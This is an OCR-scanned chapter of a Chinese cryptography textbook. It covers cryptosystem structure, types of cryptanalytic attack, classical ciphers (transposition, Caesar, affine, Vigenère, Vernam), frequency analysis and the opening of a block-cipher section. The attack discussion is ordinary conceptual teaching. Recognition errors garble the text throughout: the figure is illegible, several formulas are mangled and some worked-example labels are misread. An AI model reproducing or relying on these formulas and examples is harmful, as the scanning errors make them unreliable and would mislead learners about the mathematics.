只 能 访问 相应 权限 的 资源 ， 防 止 或 限制 经 隐蔽 通道 的 非法 访问 )。 


2.1.2 ”密码 体制 


密码 技术 的 基本 思想 是 伪装 信息 ， 使 未 授权 者 不 能 理解 它 的 真实 含义 。 所 谓 伪装 就 
是 对 数据 进行 一 组 可 道 的 数学 变换 。 伪 装 前 的 原始 数据 称 为 明文 (Plaintext)， 伪 装 后 的 
数据 称 为 密 文 (Ciphertext)， 伪 装 的 过 程 称 为 加 密 〈Encryption)。 加 密 在 加 密 密 钥 (Key) 
的 控制 下 进行 。 用 于 对 数据 加 密 的 一 组 数学 变换 称 为 加 密 算法 。 发 信者 将 明文 数据 加 密 
成 密 文 ， 然 后 将 密 文 数据 送 入 网 络 传输 或 存 入 计算 机 文件 ， 而 且 只 给 合法 收 信者 分 配 密 
钥 。 合 法 收 信者 接收 到 密 文 后 ， 施 行 与 加 密 变换 相 逆 的 变换 ， 去 掉 密 文 的 伪装 恢复 出 明 
文 ， 这 一 过 程 称 为 解密 (Decryption)。 解 密 在 解密 密 钥 的 控制 下 进行 。 用 于 解密 的 一 组 
数学 变换 称 为 解密 算法 ， 而 且 解 密 算法 是 加 密 算法 的 逆 。 因为 数据 以 密 文 形式 在 网 络 中 
传输 或 存 入 计算 机 文件 ， 而 且 只 给 合法 收 信者 分 配 密 钥 。 这 样 ， 即 使 密 文 被 非法 窃取 ， 
因为 未 授权 者 没有 密 钥 而 不 能 得 到 明文 ， 因 此 未 授权 者 也 不 能 理解 它 的 真实 含义 ， 从 而 
达到 确保 数据 秘密 性 的 目的 。 同样 , 因为 未 授权 者 没有 密 钥 也 不 能 伪造 出 合理 的 明 密 文 ， 
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因而 篡改 数据 必然 被 发 现 ， 从 而 达到 确保 数据 真实 性 的 目的 。 与 能 够 检测 发 现 算 改 数据 
的 道理 相同 ， 如 果 密 文 数据 中 发 生 了 错误 或 毁坏 也 将 能 够 检测 发 现 ， 从 而 达到 确保 数据 
完整 性 的 目的 。 

一 个 密码 系统 ， 通 常 简 称 为 密码 体制 (Cryptosystem)， 由 五 部 分 组 成 (如 图 2-1)。 

(1) 明文 空间 M， 它 是 全 体 明文 的 集合 。 

(2) 密 文 空间 C， 它 是 全 体 密 文 的 集合 。 

(3) 密 钥 空间 玉 ， 它 是 全 体 密 钥 的 集合 。 其 中 每 一 个 密 钥 天 均 由 加 密 密 钥 Ke 和 解 
密 密 钥 Ka 组 成 ， 即 K=< Ke, Ka>. 

(4) 加 密 算法 E， 它 是 一 族 由 M 到 C 的 加 密 变换 。 

S) 解密 算法 D， 它 是 一 族 由 C 到 AM 的 解密 变换 。 

对 于 每 一 个 确定 的 密 钥 ， 加 密 算 法 将 确定 一 个 具体 的 加 密 变换 ， 解 密 算法 将 确定 一 
个 具体 的 解密 变换 ， 而 且 解 密 变 换 就 是 加 密 变换 的 逆 变 换 。 对 于 明文 空间 M 中 的 每 一 个 
明文 M， 加 密 算 法 EE 在 密 钥 KK。 的 控制 下 将 明文 M 加 密 成 密 文 C: 


C=E (M, K.) (2-1) 
而 解密 算法 D RH Ka 的 控制 下 将 密 文 C 解密 出 同一 明文 M : 
M=D (C, Ka ) =D (E (M, K.), Ka) (2-2) 
攻击 者 
加 1 t 解 
明 ME ew 7 | 
F 算 se | i 文 
文 ! 道 ! 
Ve lie © |x M 
ot ee 二 
| K. 安全 信道 ee 
| | 加密 密 钥 解密 密 钥 | | 
IE ERE LEAL J 
图 2-1 密码 体制 


如 果 一 个 密码 体制 的 Ka = 及， 或 由 其 中 一 个 很 容易 推出 另 一 个 ， 则 称 为 单 密 钥 密码 
体制 或 对 称 密码 体制 或 传统 密码 体制 。 否 则 称 为 双 密 钥 密码 体制 。 进 而 ， 如 果 在 计算 上 
Ka 不 能 由 Rs 推出 ， 这 样 将 K 公开 也 不 会 损害 Ka 的 安全 ， 于 是 便 可 将 K 公开。 这 种 
密码 体制 称 为 公开 密 钥 密码 体制 ， 简 称 为 公 钥 密码 体制 。 公 开 密 钥 密码 体制 的 概念 于 
1976 *F FH W.Diffie 和 M-Hellman 提出 。 它 的 出 现 是 密码 发 展 史上 的 一 个 里 程 碑 。 


a” mn 


EE 
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如 果 能 够 根据 密 文 系统 地 确定 出 明文 或 密 钥 , 或 者 能 够 根据 明文 - 密 文 对 系统 地 确定 
出 密 钥 ， 则 我 们 说 这 个 密码 是 可 破译 的 。 研 究 密码 破译 的 科学 称 为 密码 分 析 学 。 

密码 分 析 者 攻击 密码 的 方法 主要 有 以 下 三 种 。 

C1) 穷 举 攻击 。 所 谓 穷 举 攻击 是 指 ， 密 码 分 析 者 采用 依次 试 遍 所 有 可 能 的 密 钥 对 所 
获得 的 密 文 进行 解密 ， 直 至 得 到 正确 的 明文 ; 或 者 用 一 个 确定 的 密 钥 对 所 有 可 能 的 明文 
进行 加 密 ， 直 至 得 到 所 获得 的 密 文 。 显 然 ， 理 论 上 ， 对 于 任何 实用 密码 只 要 有 足够 的 资 
源 ， 都 可 以 用 穷 举 攻击 将 其 攻破 。 从 平均 角度 讲 ， 采 用 穷 举 攻击 破译 一 个 密码 必须 试 遍 
所 有 可 能 密 钥 的 一 半 。 

值得 注意 的 是 ， 如 果 分 析 者 不 得 不 采用 穷 举 攻击 时 ， 他 们 往往 会 首先 尝试 那些 可 能 
性 最 大 的 密 钥 。 例 如 ， 基 于 用 户 为 了 容易 记忆 往往 会 选择 一 些 短 的 数据 或 有 意义 的 数据 
作为 口令 (如 姓名 、 生 日 、 电 话 号 码 、 邮 件 地 址 等 ) 这 样 的 事实 ， 黑客 在 攻击 用 户口 令 
时 往往 首先 尝试 这 些 短 的 和 有 意义 的 口令 。 这 一 事实 告诉 我 们 ， 为 了 口令 的 安全 用 户 不 
应 选择 这 种 短 的 数据 或 有 意义 的 数据 作为 口令 。 

(2) 数学 分 析 攻 击 。 所 谓 数学 分 析 攻 击 是 指 密码 分 析 者 针对 加 解密 算法 的 数学 基础 
和 某 些 密码 学 特性 ， 通 过 数学 求解 的 方法 来 破译 密码 。 数 学 分 析 攻 击 是 对 基于 数学 难题 
的 各 种 密码 的 主要 威胁 。 为 了 对 抗 这 种 数学 分 析 攻 击 ， 应 当选 用 具有 坚实 数学 基础 和 足 
够 复杂 的 加 解密 算法 。 

(3) 基于 物理 的 攻击 。 侧 信道 密码 分 析 利 用 密码 系统 实现 时 泄露 的 额外 信息 ， 推 导 
密码 系统 中 的 秘密 参数 。 主 要 方法 包括 功 耗 攻击 、 电 磁场 攻击 和 时 间 攻 击 等 。 其 中 功 耗 
攻击 是 最 常用 的 手段 之 一 ， 包 括 简 单 功 耗 分 析 攻 击 〈SimplePower Analysis attacks, SPA) 
和 差分 功 耗 分 析 攻 击 (Differential Power Analysis attacks,DPA )， 与 传统 密码 分 析 学 相 比 ， 
这 些 攻击 手段 攻击 效果 显著 。 有 效 性 远 高 于 基于 数学 进行 密码 分 析 的 方法 ， 因 此 给 密码 
设备 带 来 了 严重 的 威胁 。 

此 外 ， 根 据 密 码 分 析 者 可 利用 的 数据 资源 来 分 类 ， 可 将 攻击 密码 的 类 型 分 为 以 下 
四 种 : 

(1) 仅 知 密 文 攻击 (Ciphertext-only attack)。 所 谓 仅 知 密 文 攻击 是 指 密码 分 析 者 仅 根 
据 截获 的 密 文 来 破译 密码 。 因 为 密码 分 析 者 所 能 利用 的 数据 资源 仅 为 密 文 ， 因 此 这 是 对 
密码 分 析 者 最 不 利 的 情况 。 

(2) 已 知 明文 攻 击 (Known-plaintext attack)。 所 谓 已 知 明文 攻击 是 指 密码 分 析 者 根 
据 已 经 知道 的 某 些 明文 - 密 文 对 来 破译 密码 。 例 如 ， 密 码 分 析 者 可 能 知道 从 用 户 终端 送 到 
计算 机 的 密 文 数据 从 一 个 标准 词 “LOGIN” 开 头 。 又 例如 ， 加 密 成 密 文 的 计算 机 程序 文 
件 特 别 容易 受到 这 种 攻击 。 这 是 因为 诸如 “BEGIN”、“END”、“IF”、“THEN”、“ELSE” 
等 词 的 密 文 有 规律 地 在 密 文 中 出 现 ， 密 码 分 析 者 可 以 合理 地 猜测 它们 。 再 例如 ， 加 密 成 
密 文 的 数据 库 文 件 也 特别 容易 受到 这 种 攻击 。 这 是 因为 对 于 特定 类 型 的 数据 库 文 件 的 字 
段 及 其 取 值 往往 具有 规律 性 ， 密 码 分 析 者 可 以 合理 的 猜测 它们 。 如 学 生成 绩 数据 库 文件 
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一 定 会 包含 诸如 姓名 、 学 号 、 成 绩 等 字段 ， 而 且 成 绩 的 取 值 范围 在 0-100 之 间 。 近 代 密 
码 学 认为 ， 一 个 密码 仅 当 它 能 经 得 起 已 知 明文 攻击 时 才 是 可 取 的 。 

(3) 选择 明文 攻击 (Chosen-plaintext attack)。 所 谓 选择 明文 攻击 是 指 密码 分 析 者 能 
够 选择 明文 并 获得 相应 的 密 文 。 这 是 对 密码 分 析 者 十 分 有 利 的 情况 。 计 算 机 文件 系统 和 
数据 库 系统 特别 容易 受到 这 种 攻击 ， 这 是 因为 用 户 可 以 随意 选择 明文 ， 并 获得 相应 的 密 
文 文件 和 密 文 数据 库 。 例 如 ，Windows 环境 下 的 数据 库 SuperBase 的 密码 就 被 作者 用 选 
择 明 文 方法 破译 。 如 果 分 析 者 能 够 选择 明文 并 获得 密 文 ， 那 么 他 将 会 特意 选择 那些 最 有 
可 能 恢复 出 密 钥 的 明文 。 

(4) 选择 密 文 攻击 (Chosen-ciphertext attack)。 所 谓 选择 密 文 攻击 是 指 密码 分 析 者 能 
够 选择 密 文 并 获得 相应 的 明文 。 这 也 是 对 密码 分 析 者 十 分 有 利 的 情况 。 这 种 攻击 主要 攻 
击 公开 密 钥 密码 体制 ， 特 别 是 攻击 其 数字 签名 。 

一 个 密码 ， 如 果 无 论 密码 分 析 者 截获 了 多 少 密 文 和 用 什么 技术 方法 进行 攻击 都 不 能 
被 攻破 ， 则 称 为 是 绝对 不 可 破译 的 。 绝 对 不 可 破译 的 密码 在 理论 上 是 存在 的 ， 这 就 是 著 
名 的 “一 次 一 密 ” 密 码 。 但 是 ， 由 于 在 密 钥 管理 上 的 困难 ,“ 一 次 一 密 ” 密 码 是 不 实用 的 。 
理论 上 ， 如 果 能 够 利用 足够 的 资源 ， 那 么 任何 实际 可 使 用 的 密码 又 都 是 可 破译 的 。 

如 果 一 个 密码 ， 不 能 被 密码 分 析 者 根据 可 利用 的 资源 所 破译 ， 则 称 为 是 计算 上 不 可 
破译 的 。 因 为 任何 秘密 都 有 其 时 效 性 ， 因 此 ， 对 于 我 们 更 有 意义 的 是 在 计算 上 不 可 破译 
(Computationally unbreakable) 的 密码 。 


2.1.3 ”古典 密码 


虽然 用 近代 密码 学 的 观点 来 看 , 许多 古典 密码 是 很 不 安全 的 , 或 者 说 是 极 易 破 译 的 。 
但 是 我 们 不 能 忘记 古典 密码 在 历史 上 发 挥 的 巨大 作用 。 另 外 ， 编 制 古 典 密码 的 基本 方法 
对 于 编制 近代 密码 仍然 有 效 ， 例 如 置换 和 代替 的 方法 。 
2.1.3.1 古典 密码 实例 

1. 置换 密码 

把 明文 中 的 字母 重新 排列 ， 字 母 本 身 不 变 ， 但 其 位 置 改变 了 ， 这 样 编 成 的 密码 称 为 
置换 密码 。 

例如 把 明文 按 某 一 顺序 排 成 一 个 矩阵 , 其 中 不 足 部 分 用 @ 填充 , 而 更 是 明文 中 不 会 
出 现 的 一 个 符号 。 然 后 按 另 一 顺序 选 出 矩阵 中 的 字母 以 形成 密 文 ， 最 后 截 成 固定 长 度 的 


字母 组 作为 密 文 。 
明文 : MING CHEN WU DIAN FA DONG FAN GONG 
JERE: MINGCH 选 出 顺序 : 按 列 


ENWUDI 


E- E 


ol 
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ANFADO 
NGFANG 
ONGS Ø D 其 中 儿 为 明文 中 不 会 出 现 的 字符 ， 表 示 空 。 
密 文 : MEANO INNGN NWFFG GUAA® CDDNØ HIOGØ 
由 此 可 以 看 出 ， 改 变 矩 阵 的 大 小 和 选 出 顺序 可 以 得 到 不 同形 式 的 密码 。 置 换 密码 的 
密 钥 就 是 矩阵 的 大 小 和 选 出 顺序 。 置 换 密码 比较 简单 ， 但 它 经 不 起 已 知 明文 攻击 。 但是， 
把 它 与 其 他 密码 技术 相 结合 ， 可 以 得 到 十 分 有 效 的 密码 。 
2. 代替 密码 
首先 构造 一 个 或 多 个 密 文字 母 表 ， 然 后 用 密 文 字母 表 中 的 字母 或 字母 组 来 代替 明文 
字母 或 字母 组 ， 各 字母 或 字母 组 的 相对 位 置 不 变 ， 但 其 本 身 改 变 了 。 这 样 编 成 的 密码 称 
为 代替 密码 。 按 代替 所 使 用 的 密 文字 母 表 的 个 数 可 将 代替 密码 分 为 单 表 代 替 密 码 、 多 表 
代替 密码 和 多 名 代替 密码 。 
单 表 代 替 密 码 又 称 为 简单 代替 密码 。 它 只 使 用 一 个 密 文 字母 表 ， 并 且 用 密 文字 母 表 
中 的 一 个 字母 来 代替 一 个 明文 字母 表 中 的 一 个 字母 。 
设 4 和 B 分 别 为 含 n 个 字母 的 明文 字母 表 和 密 文字 母 表 : 
A={ ao „adı ,*, an-1 } 
B={ bo, bis Dar} 
定义 一 个 由 4 到 8 的 一 一 映射 : f4 一 B 
fai) bi 
设 明 文 M=(mo , m …, ma), WEK C =m) fm ) on))。 可 见 ， 简 单 代 替 密 
码 的 密 钥 就 是 映射 函数 或 密 文字 母 表 B。 
下 面 介绍 几 种 典型 的 简单 代替 密码 。 
a) 加 法 密码 
加 法 密码 的 映射 函数 为 


SF (a= bj =a; 
j=itk mod n (2-3) 
其 中 ，a; CA, 上 是 满足 0<k<n 的 正 整数 。 
著名 的 加 法 密码 是 古 罗 马 的 凯 萨 大 帝 (Caesar) 使 用 过 的 一 种 密码 。Caesar 密码 取 
和 3， 因 此 其 密 文字 母 表 就 是 把 明文 字母 表 循环 右 移 3 位 后 得 到 的 字母 表 。 例 如 
A={A.B.C,D.E,F,GH,LJ,K,L,M,N,O,P,Q.R.S,T,U,V,W,X,Y,Z} 
B={D,E,F,GH,LJ,K,L,M,N.,O,P.Q,R,S,T,U,V,W,X,Y,Z,A,B,C} 
明文 : MING CHEN WU DIAN FA DONG FAN GONG 
ZN: PLQJ FKHQ ZX GLDQ ID GRQJ IDQ JRQJ 
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(2) 乘法 密码 
对 于 26 个 英文 字母 ， 将 字母 A~Z 从 0 一 25 进行 编号 ， 则 乘法 密码 的 映射 函数 为 
F(a = bi =a; 
j=ik mod n (2-4) 
其 中 ， 要 求 上 与 n 互 素 。 这 是 因为 仅 当 k, n) =1 时 ， 才 存在 两 个 整数 xy 使 得 
xk+yn=1, J xk=l1 mod n, 才 有 i=xj mod n， 密 码 才 能 正确 解密 。 
例如 ， 当 用 英文 字母 表 作 为 明文 字母 表 而 取 K=13 时 ， 因为 (13,26)=13#1, 便 会 出 现 : 
TAY RORE)= AG)=AD=AR)= MM) AO) AQ)=KS)=MU)= (Wf =A 
RAB)ADIAF ADADAD- RDNAPARATAV ENA AZEN 
此 时 的 密 文 字母 表 变 为 
B={A,N,A,N, A,N,A,N, A,N,A,N, A,N,A,N, A,N,A,N, A,N,A,N,A,N} 
整个 密 文 字母 表 只 包含 A 和 对 两 个 字母 ， 密 文 将 不 能 正确 解密 。 
而 车 选 后 5， 因 为 (5,26)=1， 便 得 到 如 下 的 合理 的 密 文 字母 表 : 
A={A,B,C,D,E,F,GH,LJ,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z} 
B={A,EK,P.U,Z,E,J,O,T,Y,D,LN,S,X.C,H,M,R, W,B,GL,Q,V} 


(3) 仿 射 密码 
乘法 密码 和 加 法 密码 相 结 合 便 构成 仿 射 密码 。 仿 射 密码 的 映射 函数 为 
f(ai)=bi= aj 
j=ihth mod n (2-5) 


其 中 ， 要 求 Ca, n) =1, O<ko<n ， 且 不 允许 同时 有 hh=1 ko=0. 

简单 代替 密码 很 容易 被 破译 ， 其 原因 在 于 只 使 用 一 个 密 文 字母 表 ， 从 而 使 得 明文 中 
的 每 一 个 字母 都 只 用 唯一 的 一 个 密 文字 母 表 来 代替 。 提 高 代替 密码 强度 的 一 种 方法 是 采 
用 多 个 密 文字 母 表 ， 使 明文 中 的 每 一 个 字母 都 有 多 种 可 能 的 字母 来 代替 。 

构造 4 个 密 文字 母 表 : 

B {bp ,bi »…,b;,,) j=0, 1, +, d-l 
EX 4 个 映射 
f: AB; 
f(a)=b, j=ik mod n (2-6) 

设 密 文 M (mo , m ,**, Mar ma .**), C =(fo (mo ). fi (m ) faa (ma ). fo (ma )***) 
由 于 加 密 用 到 多 个 密 文字 母 表 ， 故 称 为 多 表 代替 密码 。 多 表 代替 密码 的 密 钥 就 是 这 
组 映射 函数 或 密 文字 母 表 。 

最 著名 的 多 表 代替 密码 要 算 16 世纪 法 国 密码 学 者 Vigenre 使 用 过 的 Vigenre 密码 。 

Vigenre 密码 使 用 26 个 密 文字 母 表 ， 像 加 法 密码 一 样 ， 它 们 是 依 此 把 明文 字母 表 循 


E: 加 
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环 右 移 0,1,2,…,25 位 的 结果 。 选 用 一 个 词组 或 短语 作 密 钥 ， 以 密 钥 字母 控制 使 用 哪 一 个 
密 文字 母 表 。 把 26 个 密 文 字母 表 排 在 一 起 称 为 Vigenre 方 阵 ， 如 表 2-1 所 示 。 


表 2-1 Vigenre 方 阵 


明文 字母 
ABCDEFGHIJKLMNOPQRSTUVWXYZ 
ABCDEFGHIJKLMNOPQRSTUVWXYZ 
BCDEFGHIJKLMNOPQRSTUVWXYZA 
CDEFGHIJKLMNOPQRSTUVWXYZAB 
DEFGHIJKLMNOPQRSTUVWXYZABC 
EFGHIJKLMNOPQRSTUVWXYZABCD 
FGHIJKLMNOPQRSTUVWXYZABCDE 
GHIJKLMNOPQRSTUVWXYZABCDEF 
HIJKLMNOPQRSTUVWXYZABCDEFG 
IJKLMNOPQRSTUVWXYZABCDEFGH 
JKLMNOPQRSTUVWXYZABCDEFGHI 
KLMNOPQRSTUVWXYZABCDEFGHIJ 
LMNOPQRSTUVWXYZABCDEFGHIJK 
MNOPQRSTUVWXYZABCDEFGHIJKL 
NOPQRSTUVWXYZABCDEFGHIJKLM 
OPQRSTUVWXYZABCDEFGHIJKLMN 
PQRSTUVWXYZABCDEFGHIJKLMNO 
QRSTUVWXYZABCDEFGHIJKLMNOP 
RSTUVWXYZABCDEFGHIJKLMNOPQ 
STUVWXYZABCDEFGHIJKLMNOPQR 
TUVWXYZABCDEFGHIJKLMNOPQRS 
UVWXYZABCDEFGHIJKLMNOPQRST 
VWXYZABCDEFGHIJKLMNOPQRSTU 
WXYZABCDEFGHIJKLMNOPQRSTUV 
XYZABCDEFGHIJKLMNOPQRSTUVW 
YZABCDEFGHIJKLMNOPQRSTUVWX 
ZABCDEFGHIJKLMNOPQRSTUVWXY 


出 
> 


Vigenre 密码 的 代替 规则 是 用 明文 字母 在 Vigenre 方 阵 中 的 列 和 密 钥 字母 在 Vigenre 
方 阵 中 的 行 的 交点 处 的 字母 来 代替 该 明文 字母 。 例 如 ， 设 明文 字母 为 P， 密 钥 字 母 为 Y， 
则 用 字母 N 来 代替 明文 字母 P。 又 例如 : 

明文 : MING CHEN WU DIAN FA DONG FAN GONG 

3848: XING CHUI PING YE KUO YUE YONG DA JIANG LIU 

密 文 : JQAME OYVLC QOYRP URMHK DOAMR NP 

Vigenre 密码 的 解密 就 是 利用 Vigenre 方 阵 进行 反 代替 。 
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3. 代数 密码 

美国 电话 电报 公司 的 Gillbert Vemam 在 1917 年 为 电报 通信 设计 了 一 种 非常 方便 的 
密码 ， 后 来 被 称 为 Vernam 449. Vernam 密码 葛 定 了 序列 密码 的 基础 ， 在 近代 计算 机 和 
通信 系统 中 得 到 广泛 应 用 。 

Vernam 密码 的 明文 、 密 钥 和 密 文 均 用 二 元 数字 序列 表示 。 

BHX M= (mo, m x, Mn), H K= Cho ki sesh), X C= (co ,cl 287, Cna), 
其 中 m, ki, EGF), W 


cmi ® ki i=0,1,***,n-1 (2-7) 
这 说 明 要 编制 Vemam 密码 ， 只 需要 把 明文 和 密 钥 表示 成 二 元 序列 ， 再 把 它们 按 位 
模 2 相 加 便 可 。 根 据 式 (2-7)， 有 
mi= ¢ @ ki (2-8) 
式 (2-8) 说 明 要 解密 Vernam 密码 ， 只 需要 把 密 文 和 密 钥 的 二 元 序列 对 位 模 2 相 加 
便 可 。 可 见 ，Vemam 密码 的 加 密 和 解密 非常 简单 ， 而 且 特 别 适合 计算 机 和 通信 系统 的 
应 用 。 
例如 : 
明文 : DATA 
1000100 1000001 1010100 1000001 
334A: LAMB 
1001100 1000001 1001101 1000010 
密 文 : 0001000 0000000 0011001 0000011 
Vernam 密码 属于 序列 密码 。 它 的 一 个 突出 优点 是 其 加 密 运算 与 解密 运算 相同 , 都 是 
模 2 加 运算 。 这 使 得 无 论 是 硬件 实现 还 是 软件 实现 这 都 是 最 简单 的 ， 而 且 加 解密 可 共用 
同一 个 软件 模块 或 硬件 电路 ， 使 工程 设计 制作 的 工作 量 减 少 一 半 。 
在 数学 上 ,如果 一 个 变换 的 正 变 换 和 北 变 换 相同 , fof, WAAR Pu, 
模 2 加 运算 @ 就 是 一 种 对 合 运算 。 因 此 ， 在 密码 设计 中 都 希望 将 其 加 密 算法 设计 成 对 合 
运算 ,这 样 使 加 解密 共用 同一 算法 ,工程 实现 工作 量 减少 一 半 。 例 如 ,著名 的 DES 和 IDEA 
等 密码 的 加 密 运算 都 是 对 合 运算 。 
Vemam 密码 经 不 起 已 知 明文 攻击 。 这 是 因为 
ki=c;® m; (2-9) 
只 要 知道 了 某 些 明文 - 密 文 对 , 便 可 以 迅速 确定 出 相应 的 密 钥 。 如果 同 一 密 钥 重 复 使 
用 或 密 钥 本 身 包含 重复 ， 则 Vemam 密码 将 是 不 安全 的 。 据 此 ， 为 了 增强 Vemam 密码 的 
强度 ， 应 当 避 免 密 钥 重复 使 用 ， 避 人 免 密 钥 本 身 包含 重复 。 一 种 极端 情况 是 : 
© 密 钥 是 真正 的 随机 序列 ; 
© 密 钥 至 少 和 明文 一 样 长 


Js 


E: 医 
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@ 一 个 密 钥 只 使 用 一 次 。 

如 果 能 够 做 到 这 些 ， 则 密码 就 是 绝对 不 可 破译 的 了 。 这 便 是 著名 的 “一 次 一 密 ” 密 
码 (one time pad)。 然 而 “一 次 一 密 ” 密 码 在 实际 上 是 行 不 通 的 。 首 先 ,“ 一 次 一 密 ” 密 
码 要 求 密 钥 是 真正 的 随机 序列 ， 这 在 实际 上 是 不 可 能 完全 做 到 的 。 其 次 ,“ 一 次 一 密 ” 密 
码 要 求 密 钥 至 少 和 明文 一 样 长 而 且 一 个 密 钥 只 使 用 一 次 。 这 意味 着 必须 经 常 地 产生 、 存 
储 大 量 的 、 很 长 的 密 钥 ， 并 且 能 够 通过 安全 的 途径 将 每 次 使 用 的 密 钥 告诉 收 信者 。 这 在 
实际 上 也 是 极 困难 的 。 可 见 ,“ 一 次 一 密 ” 密 码 在 实际 的 密 钥 管理 和 密 钥 分 配方 面 是 非常 
困难 的 ， 因 而 是 行 不 通 的 。 

虽然 “一 次 一 密 ” 密 码 在 实际 上 是 行 不 通 的 ， 但 它 在 理论 上 的 成 功 却 给 我 们 展示 出 
一 个 令 人 向 往 的 目标 。 密 码 学 者 认为 ， 如 果 能 够 用 某 种 实际 方法 来 模仿 “一 次 一 密 ” 密 
码 ， 将 会 得 到 一 种 安全 性 极 好 的 实用 密码 。 无 疑 这 是 设计 密码 的 一 种 有 效 途 径 。 
2.1.3.2 ”古典 密码 破译 方法 

1. BAD 

对 于 加 法 密码 ， 根 据 式 (2-3) 可 知 ， 密 钥 整 数 上 只 有 n-1 个 不 同 的 取 值 。 对 于 明文 
字母 表 为 英文 字母 表 的 情况 , 上 只 有 25 种 可 能 的 取 值 。 即 使 是 对 于 明文 字母 表 为 8 位 扩 
展 ASCII 码 而 言 , 大 也 只 有 255 种 可 能 的 取 值 。 因 此 ， 只 要 对 天 的 可 能 取 值 逐一 穷 举 就 
可 破译 加 法 密码 。 

乘法 密码 比 加 法 密码 更 容易 破译 。 根 据 式 (2-4) 可 知 ， 密 钥 整 数 大 要 满足 条 件 (n， 
k) =1， 因 此 , 上 只 有 9 (mM 个 不 同 的 取 值 。 去 掉 厂 1 这 一 恒 等 情 况 , 大 的 取 值 只 有 9 (n) 
一 种。 这 里 g (n) 为 n 的 欧 拉 函数 。 对 于 明文 字母 表 为 英文 字母 表 的 情况 ,Kk 只 能 取 3， 
5，7，9，11，15，17，19，21，23，25 共 11 种 不 同 的 取 值 ， 比 加 法 密码 弱 得 多 。 

仿 射 密码 的 保密 性 能 好 些 。 但 根据 式 (2-5)， 可 能 的 密 钥 也 只 有 no (n) -1 种。 对 
于 明文 字母 表 为 英文 字母 表 的 情况 ， 可 能 的 密 钥 只 有 26x12-1=311 种 。 这 一 数目 对 于 古 
代 密 码 分 析 者 企图 用 穷 举 全 部 密 钥 的 方法 破译 密码 ， 可 能 会 造成 一 定 的 困难 ， 然 而 对 于 
应 用 计算 机 进行 破译 来 说 ， 这 就 是 微不足道 的 了 。 

2. 统计 分 析 

任何 自然 语言 都 有 许多 固有 的 统计 特性 。 如 果 自 然 语 言 的 这 种 统计 特性 在 密 文 中 有 
所 反映 ， 则 密码 分 析 者 便 可 以 通过 分 析 明 文 和 密 文 的 统计 规律 而 将 密码 破译 。 许 多 古典 
密码 都 可 以 用 统计 分 析 的 方法 破译 。 

随便 阅读 一 篇 英文 文献 ， 立 刻 就 会 发 现 ， 其 中 字母 E 出 现 的 次 数 比 其 他 字母 都 多 。 
如 果 进 行 认真 统计 ， 并 且 所 统计 的 文献 的 篇 幅 足 够 长 ， 便 可 以 发 现 各 字母 出 现 的 相对 频 
率 十 分 稳定 。 而 且 ， 只 要 文献 不 特别 专门 化 ， 对 不 同 的 文献 进行 统计 所 得 的 频率 分 布 大 
体 相 同 。 根 据 各 字母 频率 的 大 小 可 将 英文 字母 分 为 几 组 。 表 2-2 描述 了 这 一 分 组 情况 。 
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#22 英文 字母 频率 分 布 
极 高 频率 字母 组 
次 高 频率 字母 组 
中 等 频率 字母 组 
低频 率 字母 组 
甚 低频 率 字母 组 
不 仅 单字 母 以 相当 稳当 的 频率 出 现 ， 而 且 双 字母 组 〈 相 邻 的 两 个 字母 ) 和 三 字母 组 
( 相 邻 的 三 个 字母 ) 同样 如 此 。 出 现 频率 最 高 的 30 个 双 字母 组 依 此 是 : 
TH HE IN ER AN RE ED ON 
ES ST EN AT TO NT HA ND 
OU EA NG AS OR TI IS ET 
IT AR TE SE HI OF 
出 现 频率 最 高 的 20 个 三 字母 组 依 此 是 : 
THE ING AND HER ERE ENT THA NTH WAS 
ETH FOR DTH HAT SHE ION HIS STH ERS 
VER 
村 别 值得 注意 的 是 ，THE 的 频率 几乎 是 排 在 第 二 位 的 ING 的 3 倍 ， 这 对 于 破译 密 
码 是 很 有 帮助 的 。 此 外 ， 统 计 资 料 还 表明 
O 英文 单词 以 E、S、D、T 为 结尾 的 超过 一 半 。 
© 英文 单词 以 T、A、S、W 为 起 始 字母 的 约 占 一 半 。 
以 上 所 有 这 些 统计 数据 ， 对 于 密码 分 析 者 来 说 都 是 十 分 有 用 的 信息 。 
破译 单 代 替 密 码 的 大 致 过 程 是 : 首先 统计 密 文 的 各 种 统计 特征 , 如 果 密 文 量 比较 多 ， 
则 完成 这 步 后 便 可 确定 出 大 部 分 密 文字 母 ， 其 次 分 析 双 字母 、 三 字母 密 文 组 ， 以 区 分 元 
音 和 辅音 字母 ， 最 后 分 析 字 母 较 多 的 密 文 ， 在 这 一 过 程 中 大 胆 使 用 猜测 的 方法 ， 如 果 猜 
对 一 个 或 几 个 词 ， 就 会 大 大 加 快 破译 过 程 。 
密码 破译 是 十 分 复杂 和 需要 极 高 智力 的 劳动 。 世 界 上 第 一 台 计 算 机 一 诞生 便 投入 密 
码 破译 的 应 用 ， 目 前 计算 机 已 经 成 为 密码 破译 的 主要 工具 。 可 以 预计 ， 随 着 计算 机 科学 
技术 的 发 展 ， 计 算 机 在 密码 破译 中 将 会 发 挥 更 大 的 作用 。 


2.2 分 组 密码 


2.2.1 分 组 密码 的 概念 


根据 明 密 文 的 划分 和 密 钥 的 使 用 不 同 ， 可 将 密码 体制 分 为 分 组 密码 和 序列 密码 
体制 。 


a> 加 
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BM 为 明文 ， 分 组 密码 将 M 划分 为 一 系列 的 明文 块 Mi， 通 常 每 块 包含 若干 位 或 字 
符 ， 并 且 对 每 一 块 M6 都 用 同一 个 密 钥 K 进行 加 密 。 即 
M =(Mi , M2, ，…, Mn), 
CC iG, S 


其 中 
CGi=E(M, K) il2,.en (2-10) 
而 序列 密码 将 明文 和 密 钥 都 划分 为 位 (bit) 或 字符 的 序列 ， 并 且 对 于 明文 序列 中 的 
每 一 位 或 字符 都 用 密 钥 序列 中 的 对 应 分 量 来 加 密 ， 即 
M=(m, m2,***, mn ), 
Kk, = (kg shee), 
C (eCa *** sen); 
其 中 
c = E(m,,k,) i=1,2, =n (2-11) 
分 组 密码 每 一 次 加 密 一 个 明文 块 ， 而 序列 密码 每 一 次 加 密 一 位 或 一 个 字符 。 分 组 密 
码 和 序列 密码 在 计算 机 系统 中 都 有 广泛 的 应 用 。 序 列 密码 是 要 害 部 门 使 用 的 主流 密码 ， 
而 商用 领域 则 多 用 分 组 密码 。 
下 面 ， 我 们 通过 几 种 有 代表 性 的 近代 分 组 密码 ， 如 DES. AES 算法 ， 讨 论 分 组 密码 
的 基本 理论 及 其 在 计算 机 和 通信 系统 中 的 实际 应 用 。 
2.2.2 DES 算法 


为 了 适应 社会 对 计算 机 数据 安全 保密 越 来 越 高 的 需求 ， 美 国 国家 标准 局 (NBS) 于 
